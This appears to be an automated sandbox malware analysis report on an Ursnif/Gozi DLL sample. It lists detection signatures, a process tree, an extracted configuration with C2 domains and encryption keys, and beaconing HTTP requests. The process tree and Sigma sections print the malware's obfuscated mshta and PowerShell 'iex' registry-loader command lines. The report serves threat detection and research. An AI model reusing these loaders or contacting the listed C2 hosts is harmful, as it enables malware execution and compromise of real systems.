Loading ...

Play interactive tourEdit tour

Windows Analysis Report 6.png

Overview

General Information

Sample Name:6.png (renamed file extension from png to dll)
Analysis ID:539457
MD5:ac57d694b86d8532b38d3d62f6de3afc
SHA1:c858ec742ba91bf8c139b7bb654ca2d67747c5ef
SHA256:fa668d1a58b3b92d9c1b9a740facfaebb35dd723deaf5a3833592208a8a47e5e
Tags:dllexegeofencedGoziisfbITAursnif
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Maps a DLL or memory area into another process
Writes to foreign memory regions
PE file has a writeable .text section
Writes or reads registry keys via WMI
Machine Learning detection for sample
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Call by Ordinal
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Sigma detected: Suspicious Csc.exe Source File Folder
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Registers a DLL
PE / OLE file has an invalid certificate
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6360 cmdline: loaddll32.exe "C:\Users\user\Desktop\6.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 6376 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6400 cmdline: rundll32.exe "C:\Users\user\Desktop\6.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 4904 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • rundll32.exe (PID: 3492 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
    • regsvr32.exe (PID: 6388 cmdline: regsvr32.exe /s C:\Users\user\Desktop\6.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • control.exe (PID: 4912 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • rundll32.exe (PID: 6424 cmdline: rundll32.exe C:\Users\user\Desktop\6.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • control.exe (PID: 6580 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • BackgroundTransferHost.exe (PID: 5876 cmdline: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1 MD5: 02BA81746B929ECC9DB6665589B68335)
  • mshta.exe (PID: 4036 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 7132 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 5760 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6152 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES148E.tmp" "c:\Users\user\AppData\Local\Temp\wklr4juq\CSC206B99537D694137B0FEEBD968CAD59B.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • mshta.exe (PID: 1488 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ygup='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ygup).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 7012 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 7048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6552 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 3620 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES451.tmp" "c:\Users\user\AppData\Local\Temp\nigogz4l\CSCB0FB5A4205944E4B1A4F1A7502114E8.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 3520 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
  • mshta.exe (PID: 3696 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Me2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Me2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 7160 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6188 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6796 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES11BF.tmp" "c:\Users\user\AppData\Local\Temp\nlbomp32\CSCD36E4F5AB95F41AC9563905B5139F56.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • mshta.exe (PID: 496 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cf1r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cf1r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 3532 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 4196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6248 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6540 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B16.tmp" "c:\Users\user\AppData\Local\Temp\uu5u2nmv\CSC63445C49B154491498BDD3FB79A78AC.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "B+xl4hUTn5rXiL0afazu2ddSc/ECZk5wqODKe0fS2KdIXHYzLOi+LPPP1HVzyCQFE2ZPog7imXfWyeJPGgVZO8mmh7g0OCbF0hBgHX6wj0qY1fBDcQxYjLnhuuJTPFt0voqEKHGGIgbiz86prZpdJls6h0dECkyqCOUP77xD4bHwJFYwmMp7govarzlBsbdorQ4qNFnd4O2rK1GEuQisAwdMkb4j9MqHf7vkHewrh1BGBeNcr85NjoxXAnfZDuX+M7b1dWoszYHJF1rgWzk4yz7fc+7Q4leAIr2PkWbTRuRpOe4P6Ok01hKGTLORQhRgWw6Mv2aRFMimHgiQWhhaHetICEhMcBl5C0yxhZCOhu4=", "c2_domain": ["microsoft.com/windowsdisabler", "windows.update3.com", "berukoneru.website", "gerukoneru.website", "fortunarah.com"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 27 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: MSHTA Spawning Windows ShellShow sources
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4036, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ProcessId: 7132
            Sigma detected: Suspicious Call by OrdinalShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\6.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\6.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6376, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\6.dll",#1, ProcessId: 6400
            Sigma detected: Mshta Spawning Windows ShellShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4036, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ProcessId: 7132
            Sigma detected: Suspicious Csc.exe Source File FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7012, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline, ProcessId: 6552
            Sigma detected: Suspicious Rundll32 ActivityShow sources
            Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 4904, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, ProcessId: 3492
            Sigma detected: Non Interactive PowerShellShow sources
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4036, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ProcessId: 7132
            Sigma detected: T1086 PowerShell ExecutionShow sources
            Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132839804557459233.7132.DefaultAppDomain.powershell

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000004.00000002.913785412.0000000000D60000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "B+xl4hUTn5rXiL0afazu2ddSc/ECZk5wqODKe0fS2KdIXHYzLOi+LPPP1HVzyCQFE2ZPog7imXfWyeJPGgVZO8mmh7g0OCbF0hBgHX6wj0qY1fBDcQxYjLnhuuJTPFt0voqEKHGGIgbiz86prZpdJls6h0dECkyqCOUP77xD4bHwJFYwmMp7govarzlBsbdorQ4qNFnd4O2rK1GEuQisAwdMkb4j9MqHf7vkHewrh1BGBeNcr85NjoxXAnfZDuX+M7b1dWoszYHJF1rgWzk4yz7fc+7Q4leAIr2PkWbTRuRpOe4P6Ok01hKGTLORQhRgWw6Mv2aRFMimHgiQWhhaHetICEhMcBl5C0yxhZCOhu4=", "c2_domain": ["microsoft.com/windowsdisabler", "windows.update3.com", "berukoneru.website", "gerukoneru.website", "fortunarah.com"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}
            Machine Learning detection for sampleShow sources
            Source: 6.dllJoe Sandbox ML: detected
            Source: 6.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49795 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49796 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49797 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49798 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49799 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49801 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49802 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49803 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49805 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49806 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49807 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49808 version: TLS 1.2
            Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.452232416.0000000004AA0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.431445543.0000000006530000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.427791226.0000000005CD0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.437889471.0000000006160000.00000004.00000001.sdmp
            Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.452232416.0000000004AA0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.431445543.0000000006530000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.427791226.0000000005CD0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.437889471.0000000006160000.00000004.00000001.sdmp
            Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.pdb561934e089 source: powershell.exe, 00000019.00000003.455310412.00000254DC7BD000.00000004.00000001.sdmp

            Networking:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\SysWOW64\rundll32.exeDomain query: berukoneru.website
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 79.110.52.144 187Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeDomain query: windows.update3.com
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 18.219.227.107 187Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 3.12.124.139 187Jump to behavior
            Source: Joe Sandbox ViewASN Name: V4ESCROW-ASRO V4ESCROW-ASRO
            Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
            Source: global trafficHTTP traffic detected: GET /tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9onw/Df8mv9bGmzrCq_2BDh/Avhzr_2BW/zhUOFRSj_2Brp9dFi25e/XIimtsTVgbS8Ddk4Jlg/q7ifDAWTLXmxh8fPSAYnUc/3K8xDlQvgKVYD/9E1TEXJC/aPKjFJSRgVkfUwKBYWKDgLh/VONwiC9wK5/3CPG7RAhZST/_2FDfWf.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHYA4xvaox/Zos6wfhvU6Vx/dZ_2FhTkVUm/dQ1eWiBdVQx_2F/3MQ4AfN6CRhAz7ojdkAuB/vyHN6D_2BnDaccRD/rxLm6HRGflkJaqH/HtsgyaJ8NMuefJHJTr/vf407nMOm/3YNEpWUoxMPlA61ciEA5/ZB4w8oLbC0y/cC.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/fGFKjH5BjbdZz4tmUO5m/ZAUfPXxElw8Dkm9Cfh9/xqmrK6ieQrOr54I1y1Md2B/CJZjvCZRXK_2B/c6YLK40A/ibGCXB5z8qRJaf9iUFEBazW/9sEXIVndb3/DsRsV2z8TCrjx7mBI/rTZxp021lQBU/ESMggS1gJ_2/Bi3Bcj9_2B8Xf4/Xr9j2PgVhY9_2FzIeDatB/WE3DM_2B4ZBLmr9g/bExshi993/JbJC0wJJ/U.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/cFJsSWAGWE/z2qui_2Bz1BNPPVC8/40cjfJwuY_2F/qeMRrcIZBVG/Ne0YpnkwEJfIh3/f5okxbrq_2FXxzqJmpSlY/lBFuBWEAi70a61Vy/5QzGUBrPY97n5jQ/Uty84umyFnIA829ewc/61TtijfTY/zF0ZOoxI3N5pWHzggULR/QMXY_2F7FMDggc4thO7/G_2BQV4WNp08p5XmI0/TT.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/659nN8frXqL/KI_2BmGQcF3l8a/UPJEdWRElF2Ck7h3GrI7f/Jn4UaIHKOCKly3pR/5WtUgfhtCob3WA8/8RFl0SkPd8NK0tapfV/Bv03ARxcw/T6wxTs3S_2BFMRgrZw2Q/_2BV_2F7vXjmj/i.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/9IgUYNG9/P9N8jGg62VAhbwmUeolHFCg/K1HN9iUPdi/an2HdiNP_2FRIROSF/l9uR7XFSquKc/cTL90RaThvy/4LigE_2BC67Pa2/OL_2Fq6LzSFfAjBrcF1my/5AUpi_2BYfx15AAS/Ho8688ZDo7zPK6r/e_2F4ZPz87sJSle6kT/I1gJ4hikp/cCibgdVeBM9n2ccXEO18/D4MJBqmD.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/iH0556GjtiGQk4lyd6/e4eJ66Hyx/L2n2id7yGxzkaZSAZenq/25xy0D1xFkintWrbCAo/f_2Bdm0MJPWq7ugWEYUqSU/PtgL_2FeeZv0h/UCRQYI_2/FefNYP32vk23pbK3jV8vqXP/0Ovr3EWUID/eiKH_2Fkr5cf0tXqX/_2BscW0pxtbY/lmzrmCcsUPq/Hp_2BA_2BliXkb/fgGnQnQH8/_2B.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
